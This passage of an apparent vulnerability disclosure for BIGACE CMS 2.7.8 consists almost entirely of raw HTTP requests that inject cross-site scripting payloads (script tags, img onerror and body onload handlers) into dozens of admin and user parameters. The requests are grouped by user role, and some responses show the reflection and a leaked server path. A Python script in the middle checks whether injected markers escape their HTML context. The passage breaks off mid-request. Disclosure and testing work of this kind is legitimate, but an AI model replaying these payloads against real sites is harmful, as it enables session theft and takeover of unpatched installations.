data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---
31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
Cheers o/
I decide to check it again, and I found few other things described below.
I. For normal registered ('anonymous') user:
1. Escaping from the source code via Host header:
---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---
Response:
<link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaa
aaaaa%3c%68%3 1%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text
II. For editor user logged-in:
1. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500
-----------------------------60191211818685
Content-Disposition: form-data; name="mode"
upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"
"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------60191211818685--
---< request >---
15. xss + information disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode="%20body%20onload%3d"alert(4321)"%3e
---< request >---
Response:
<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>. All rights reserved. <br />© 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---
III. For a logged-in 'designer' user:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214
designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---
IV. For a logged-in admin user:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
Response:
<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022
-----------------------------309932421512500
Content-Disposition: form-data; name="mode"
upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"
a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------309932421512500--
---< request >---
3. xss: the same request, with the payload in the data[name] parameter.
4. xss: the same again for the data[unique_name] and data[description] parameters.
data[description] is reflected inside a <textarea>, so to reproduce it the
payload must first close that tag, for example:
</textarea><script>alert(2)</script>
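The hidden-input response in item 1 above and the <textarea> note are two different reflection contexts: in the first a `"` is enough to leave the attribute value, in the second the payload has to emit `</textarea>` before any tag is parsed at all. The Python script below is an added example, not code from the original post or from BIGACE. It takes a response body, finds a marker string that was submitted in a parameter, classifies the HTML context it landed in, and reports whether the break-out character for that context came back unencoded. The sample responses are constructed to mirror the `data[nextAdmin]` hidden input and the `data[description]` textarea; the marker, the probe tail and the context names are my own choices.

```python
import html

# Marker + break-out tail: the marker locates the reflection, the tail tells us
# which of the characters needed to leave each context came back unencoded.
MARKER = "zq9xss"
TAIL = "'\"<>"
PROBE = MARKER + TAIL

# Character that must survive unencoded to break out of each context.
# (Unquoted attributes need no quote: a space is enough to add an attribute.)
NEEDED = {
    "html_text": "<",
    "textarea": "<",        # </textarea> first, then a tag, as in the note above
    "script": "<",          # </script> break-out; JS string escapes not modelled
    "attr_dq": '"',
    "attr_sq": "'",
    "attr_unquoted": "",
}


def _context(body, pos):
    """Classify the HTML context at offset `pos` by looking at what precedes it."""
    before = body[:pos]
    lowered = before.lower()
    for raw in ("textarea", "script"):
        open_i = lowered.rfind("<" + raw)
        close_i = lowered.rfind("</" + raw)
        if open_i > close_i and before.find(">", open_i) != -1:
            return raw
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                               # an open tag: we are in an attribute
        quote = None
        for ch in before[lt:]:                # track the currently open quote
            if quote is None and ch in "\"'":
                quote = ch
            elif ch == quote:
                quote = None
        return {'"': "attr_dq", "'": "attr_sq"}.get(quote, "attr_unquoted")
    return "html_text"


def _literal_tail(window):
    """Return the tail characters that came back literally, skipping HTML entities."""
    literal, i = [], 0
    for _ in range(len(TAIL)):
        if i >= len(window):
            break
        if window[i] == "&":
            end = window.find(";", i)
            if 0 < end - i <= 7:              # &quot; &#39; &#x27; &lt; &gt; ...
                i = end + 1
                continue                      # encoded, hence not usable
        if window[i] in TAIL:
            literal.append(window[i])
        i += 1
    return "".join(literal)


def check_reflections(body, marker=MARKER):
    """One finding per marker occurrence: context, surviving tail chars, break-out verdict."""
    findings, start = [], 0
    while (pos := body.find(marker, start)) != -1:
        after = pos + len(marker)
        ctx = _context(body, pos)
        literal = _literal_tail(body[after:after + 8 * len(TAIL)])
        findings.append({
            "context": ctx,
            "literal": literal,
            "breakout": all(c in literal for c in NEEDED[ctx]),
        })
        start = after
    return findings


# Constructed responses (not captured from BIGACE), modelled on the hidden-input
# reflection shown in item 1 above and on the data[description] textarea.
SAMPLES = {
    "hidden_input_raw": '<input type="hidden" name="data[nextAdmin]" value="%s">' % PROBE,
    "hidden_input_escaped": '<input type="hidden" name="data[nextAdmin]" value="%s">'
                            % html.escape(PROBE, quote=True),
    "textarea_raw": '<textarea name="data[description]">%s</textarea>' % PROBE,
    "textarea_lt_escaped": '<textarea name="data[description]">%s</textarea>'
                           % PROBE.replace("<", "&lt;"),
    "table_cell_raw": "<td>%s</td>" % PROBE,
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, check_reflections(body))
```

To use it against the requests above, send PROBE in place of the alert payload and pass each response body to check_reflections(). A finding with breakout True in an attr_dq context is exactly what the item 1 response shows; a textarea finding whose literal string lacks `<` means the `</textarea>` prefix alone will not get you out, and a finding with an empty literal string means the output was encoded for that context.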
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420
-----------------------------47528326907
Content-Disposition: form-data; name="mode"
upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"
"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------47528326907--
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52
data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
